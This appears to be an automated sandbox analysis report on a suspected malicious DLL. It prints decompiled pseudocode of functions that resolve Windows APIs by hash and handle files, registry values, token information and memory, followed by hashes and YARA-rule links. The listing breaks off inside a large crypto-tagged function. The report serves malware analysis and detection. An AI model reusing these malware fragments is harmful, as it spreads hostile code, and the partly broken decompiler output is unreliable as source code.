						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x708d5b29
0x708d5b2d
0x708d5b30
0x708d5b33
0x708d5b75
0x708d5b7e
0x708d5b84
0x708d5b85
0x708d5b77
0x708d5b79
0x708d5b79
0x708d5b9b
0x708d5baf
0x708d5b9d
0x708d5baa
0x708d5bac
0x708d5bac
0x708d5bb1
0x708d5bb6
0x708d5bc4
0x708d5c2f
0x708d5c32
0x00000000
0x708d5bc6
0x708d5bcb
0x708d5c18
0x708d5c1c
0x708d5c26
0x708d5c26
0x708d5c1c
0x708d5bcd
0x708d5bd9
0x708d5bde
0x708d5beb
0x708d5bf2
0x708d5bfe
0x708d5bff
0x708d5c06
0x708d5bf4
0x708d5bf4
0x708d5bf5
0x708d5bf6
0x708d5bf8
0x708d5bfa
0x708d5bfb
0x708d5bfb
0x708d5bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 708D5BAA

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction ID: d562c832e9463c537680e5594df91d39108858083e37a6168597a496a56b3fc6
Opcode Fuzzy Hash: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction Fuzzy Hash: E301DB70380307BEEB2116159C43F3F766FDFDA664F158B6BB94266285DF519C048131

Uniqueness

Uniqueness Score: -1.00%

Function 708D5B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E708D5B3D(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E708D2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E708CC328(_t24);
				if(E708CC33C(_t24) != 0) {
					_t34[2] = E708D352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E708D2F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E708D35D4(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					_t15 = E708D2F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x708d5b3d
0x708d5b44
0x708d5b47
0x708d5b75
0x708d5b7e
0x708d5b84
0x708d5b85
0x708d5b77
0x708d5b79
0x708d5b79
0x708d5b9b
0x708d5baf
0x708d5b9d
0x708d5baa
0x708d5bac
0x708d5bac
0x708d5bb1
0x708d5bb6
0x708d5bc4
0x708d5c2f
0x708d5c32
0x00000000
0x708d5bc6
0x708d5bcb
0x708d5c18
0x708d5c1c
0x708d5c26
0x708d5c26
0x708d5c1c
0x708d5bcd
0x708d5bd9
0x708d5bde
0x708d5beb
0x708d5bf2
0x708d5bfe
0x708d5bff
0x708d5c06
0x708d5bf4
0x708d5bf4
0x708d5bf5
0x708d5bf6
0x708d5bf8
0x708d5bfa
0x708d5bfb
0x708d5bfb
0x708d5bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 708D5BAA

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction ID: d1052dbce549ae1caa646ec0d50fc02fe142f71305762b976d3c8a75fa339d28
Opcode Fuzzy Hash: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction Fuzzy Hash: F5012B203803077EE71116218C83F3F766FDB8A260F108B6BF94261285DF6198048131

Uniqueness

Uniqueness Score: -1.00%

Function 708D5B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E708D5B1F(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E708D2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E708CC328(_t23);
				if(E708CC33C(_t23) != 0) {
					_t31[2] = E708D352C(0x100);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E708D2F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E708D35D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E708D2F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x708d5b1f
0x708d5b26
0x708d5b75
0x708d5b7e
0x708d5b84
0x708d5b85
0x708d5b77
0x708d5b79
0x708d5b79
0x708d5b9b
0x708d5baf
0x708d5b9d
0x708d5baa
0x708d5bac
0x708d5bac
0x708d5bb1
0x708d5bb6
0x708d5bc4
0x708d5c2f
0x708d5c32
0x00000000
0x708d5bc6
0x708d5bcb
0x708d5c18
0x708d5c1c
0x708d5c26
0x708d5c26
0x708d5c1c
0x708d5bcd
0x708d5bd9
0x708d5bde
0x708d5beb
0x708d5bf2
0x708d5bfe
0x708d5bff
0x708d5c06
0x708d5bf4
0x708d5bf4
0x708d5bf5
0x708d5bf6
0x708d5bf8
0x708d5bfa
0x708d5bfb
0x708d5bfb
0x708d5bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 708D5BAA

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction ID: b323cd7f00c09706344bc76b1ab2a358dbb305f138a08f917756fc6c92f350fc
Opcode Fuzzy Hash: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction Fuzzy Hash: DB01A970780307BEEB1116259C43F3F766FDB9A664F108B6BB94265285DF51A9148131

Uniqueness

Uniqueness Score: -1.00%

Function 708D5B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E708D5B6D(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E708D2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E708CC328(_t23);
				if(E708CC33C(_t23) != 0) {
					_t31[2] = E708D352C(0);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E708D2F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E708D35D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E708D2F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x708d5b6d
0x708d5b71
0x708d5b75
0x708d5b7e
0x708d5b84
0x708d5b85
0x708d5b77
0x708d5b79
0x708d5b79
0x708d5b9b
0x708d5baf
0x708d5b9d
0x708d5baa
0x708d5bac
0x708d5bac
0x708d5bb1
0x708d5bb6
0x708d5bc4
0x708d5c2f
0x708d5c32
0x00000000
0x708d5bc6
0x708d5bcb
0x708d5c18
0x708d5c1c
0x708d5c26
0x708d5c26
0x708d5c1c
0x708d5bcd
0x708d5bd9
0x708d5bde
0x708d5beb
0x708d5bf2
0x708d5bfe
0x708d5bff
0x708d5c06
0x708d5bf4
0x708d5bf4
0x708d5bf5
0x708d5bf6
0x708d5bf8
0x708d5bfa
0x708d5bfb
0x708d5bfb
0x708d5bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 708D5BAA

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction ID: 39c43763eebe893ff6e84fdd0494a65e28bdc025dcc9e4fc82084f2a4fc8b974
Opcode Fuzzy Hash: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction Fuzzy Hash: 3CF02D303803077ED72117218C43F3F7A7FDF9A560F108B6BB94261281DF51A8148131

Uniqueness

Uniqueness Score: -1.00%

Function 708D5D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E708D5D7C(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E708CC33C(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E708D2F8C(0x4bcc7cba, 0xceed09cc) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x708d5d80
0x708d5d81
0x708d5d83
0x708d5d89
0x708d5d8b
0x708d5d8f
0x708d5d8f
0x708d5d93
0x708d5d9f
0x708d5dd3
0x708d5dd3
0x00000000
0x708d5da1
0x708d5da6
0x708d5da7
0x708d5dbb
0x708d5dcc
0x708d5dbd
0x708d5dc8
0x708d5dc8
0x708d5dd1
0x708d5dd9
0x708d5ddb
0x708d5dde
0x708d5de3
0x708d5de3
0x708d5de7
0x708d5dec
0x00000000
0x00000000
0x00000000
0x708d5dd1

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,CEED09CC,?,?,00000000,00000000,?,708D5CB4,?,?), ref: 708D5DC8

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction ID: 44f458ed996c6cd1639c657736e5ca3d0c14a3399b57ca8ba74dc4081b2949ca
Opcode Fuzzy Hash: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction Fuzzy Hash: 17F0F431A097516DD3515A389C45B9FB7F7EFD9360F204B3FF682E6244EB60984086B0

Uniqueness

Uniqueness Score: -1.00%

Function 708D10CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E708D10CC(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E708D2F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E708D2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0xd0443454
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x708d10da
0x708d10dc
0x708d10ea
0x708d10ee
0x708d1137
0x00000000
0x708d1137
0x708d10f3
0x708d10f4
0x708d10f6
0x708d10fb
0x00000000
0x708d1114
0x708d1118
0x708d1125
0x708d1129
0x00000000
0x00000000
0x00000000
0x708d1132

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,D0443454,00000004,D0443458,D0443458,D0443458), ref: 708D1125

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction ID: f94c00e1cf3916ebd65886a37997baa1300190cacf82701247e80a13e22e206d
Opcode Fuzzy Hash: ad9c72b20c447e21fde483402609026f9e34a91fec1d63206d321a76ac7e48c5
Instruction Fuzzy Hash: 5AF049B47042467BFF0596389D16F7F32AEAFC9610F50CA2CB641DA388EA78C9459321

Uniqueness

Uniqueness Score: -1.00%

Function 708D55B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E708D55B8(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E708D2F8C(0xd0443458, 0x286b2253) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E708CE6E8(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x708d55c2
0x708d55c4
0x708d55cb
0x708d55cd
0x708d55d1
0x708d55d3
0x708d55d6
0x708d55d9
0x708d55d9
0x708d55f3
0x00000000
0x00000000
0x708d5604
0x708d5608
0x00000000
0x00000000
0x708d5616
0x708d5619
0x708d561e
0x708d5623
0x708d5623

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,D0443458,286B2253,?,?,D0443458,286B2253), ref: 708D5604

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction ID: 50f4047a62e4cba5751b857b8475fc71bb3b0facb54b142b1752690bd06439a6
Opcode Fuzzy Hash: 32541c393d7cf9c9ac655dde4adff585132c35c09fbad7829b6a85831b260ca8
Instruction Fuzzy Hash: 13F0A4B52002096EE7255E1AEC44DBBB7FEDBD4B14F00861EB1D643204DA30AC1085A0

Uniqueness

Uniqueness Score: -1.00%

Function 708D5DF0, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E708D5DF0(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E708CC33C(_t19) == 0) {
					_v12 = _a8;
					if(E708D2F8C(0x4bcc7cba, 0x2876e068) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E708D352C(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x708d5df3
0x708d5df5
0x708d5e01
0x708d5e0b
0x708d5e21
0x708d5e40
0x708d5e23
0x708d5e34
0x708d5e38
0x708d5e58
0x708d5e3a
0x708d5e3a
0x708d5e3a
0x708d5e38
0x708d5e41
0x708d5e46
0x708d5e4f
0x708d5e48
0x708d5e48
0x708d5e4a
0x708d5e4a
0x708d5e03
0x708d5e03
0x708d5e03
0x708d5e55

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,4BCC7CBA,2876E068,?,?,?,708D5CE5,00000000,?,00000000,?), ref: 708D5E34

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction ID: 9a7365db43c672bf7d809f5a8973eb91adbd50511f4727ee3f7fde43e85a92b8
Opcode Fuzzy Hash: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction Fuzzy Hash: AEF0A971208216AED711BB28DC41A5FB7E7EF4C150F108B2FB89AD2344DB31DA048731

Uniqueness

Uniqueness Score: -1.00%

Function 708D3564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E708D3564(void* __ecx) {
				void* _t3;
				intOrPtr* _t8;
				void* _t12;

				_t12 = __ecx;
				if( *0x708dd228 == 0xcd845700) {
					_t8 = E708D2F8C(0xa5eabdf8, 0xd926c223);
					 *0x708dd22c = E708D2F8C(0xa5eabdf8, 0x9b42cb07);
					if( *0x708dd228 == 0xcd845700) {
						 *_t8(2, 0, 0, 0, 0, 0); // executed
						 *0x708dd228 = 0;
					}
				}
				_t3 = E708D2F8C(0xa5eabdf8, 0x80febacc);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t12);
					_push(8);
					_push( *0x708dd228);
					asm("int3");
					return _t3;
				}
			}

0x708d356c
0x708d3574
0x708d35a7
0x708d35b8
0x708d35c3
0x708d35ce
0x708d35d0
0x708d35d0
0x708d35c3
0x708d3580
0x708d3587
0x708d3597
0x708d3589
0x708d3589
0x708d358a
0x708d358c
0x708d358e
0x708d358f
0x708d358f

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,A5EABDF8,9B42CB07,A5EABDF8,D926C223,?,?,00000000,708CDEB9,?,?), ref: 708D35CE

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 7be118157b01ad9f4e78ced8f85a2025450385ed06fe899361a7e864088e7fdf
Instruction ID: 0147870a5d38405dd50695f03087480da8dc1b54a04052e51ae3ac85583e9c71
Opcode Fuzzy Hash: 7be118157b01ad9f4e78ced8f85a2025450385ed06fe899361a7e864088e7fdf
Instruction Fuzzy Hash: 72F089B2248211FDD2111B76FC05E1EFEFEEFCC626BA08969B655AA240DA144840D631

Uniqueness

Uniqueness Score: -1.00%

Function 02DF1604, Relevance: 1.4, APIs: 1, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 02DF1720

Memory Dump Source

Source File: 00000002.00000002.494062433.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 99469d315d7e96e7c6a2aa8cb6bae2f18d8bfe8ee7b92197b6cc725208e467b8
Instruction ID: cf5eba1d19351de58b5d672a6f29292e40dd1a735b3440d9e0e294b6a71c167f
Opcode Fuzzy Hash: 99469d315d7e96e7c6a2aa8cb6bae2f18d8bfe8ee7b92197b6cc725208e467b8
Instruction Fuzzy Hash: AB41E4B5E042198FDB48DF98D494AAEBBF1FF48310F15852EE948AB340D375A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 708C9144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E708C9144(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				char _v60;
				intOrPtr _v92;
				void* _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				signed int _v116;
				char _v128;
				intOrPtr _v132;
				void* _v136;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v156;
				char _v160;
				signed int _v164;
				char _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				char _v196;
				void* _v200;
				signed int _v204;
				char _v208;
				char _v212;
				char _v216;
				intOrPtr _v220;
				intOrPtr _v228;
				intOrPtr _v236;
				void* _v268;
				char _v292;
				char _v308;
				char _v316;
				char _v320;
				void* _v324;
				char _v332;
				char _v340;
				void* _v356;
				void* _v360;
				char _v364;
				char _v380;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				intOrPtr _v400;
				signed int _v404;
				char _v408;
				void* _v412;
				char _v416;
				signed int* _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				intOrPtr _v440;
				signed int* _v444;
				char _v448;
				void* _v452;
				intOrPtr _v460;
				char _v464;
				void* _v468;
				char _v472;
				intOrPtr _v476;
				char _v480;
				void* _v484;
				char _v492;
				char _v496;
				void* _v500;
				char _v508;
				char _v516;
				signed int _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				void* _v548;
				char _v552;
				char _v556;
				char _v560;
				signed int _v564;
				signed int _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				signed int _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				char _v648;
				char _v652;
				char _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t437;
				intOrPtr _t442;
				signed int _t444;
				char* _t459;
				char _t534;
				signed int _t544;
				intOrPtr _t546;
				signed int _t550;
				signed int _t556;
				intOrPtr _t561;
				signed int _t567;
				char _t579;
				intOrPtr _t584;
				char _t585;
				intOrPtr _t589;
				char _t590;
				intOrPtr _t594;
				char _t595;
				intOrPtr _t599;
				char _t600;
				intOrPtr _t604;
				char _t605;
				intOrPtr _t609;
				signed int _t622;
				char _t629;
				intOrPtr _t633;
				signed char* _t635;
				signed int _t638;
				intOrPtr _t641;
				signed int* _t647;
				signed int* _t650;
				intOrPtr _t665;
				char* _t806;
				signed int* _t836;
				char* _t837;
				char* _t844;
				void* _t845;
				intOrPtr* _t854;
				signed int* _t856;
				intOrPtr* _t857;
				signed int* _t858;
				signed int* _t860;
				signed int* _t863;
				intOrPtr _t864;
				intOrPtr _t867;
				char _t868;
				signed int _t869;
				intOrPtr* _t872;
				intOrPtr* _t874;
				intOrPtr* _t875;
				intOrPtr* _t876;
				intOrPtr* _t877;
				intOrPtr* _t878;
				signed int* _t881;
				intOrPtr* _t882;
				char* _t907;
				void* _t935;
				char _t950;
				char _t951;
				intOrPtr* _t953;
				void* _t954;
				intOrPtr* _t955;
				void* _t957;

				_t957 = __eflags;
				_t953 =  &_v496;
				_t641 = __edx;
				_v40 = __ecx;
				_t951 =  *((intOrPtr*)(__ecx + 0xc));
				E708D2F8C(0x23627913, 0xae88daa3);
				_v496 = 0;
				E708CF620( &_v492, 0);
				_v480 = 0;
				_v476 = 0;
				E708CF620( &_v472, 0);
				_v528 = 0;
				E708CF620( &_v524, 0);
				_v392 = 0x4145240a;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x90], xmm0");
				E708CF8C4( &_v528, E708CF568( &_v528) + 0x10);
				E708CF558( &_v532, E708CF568( &_v532) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v540 = _v540 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v536 + 0x88)) = 0x22dc1034;
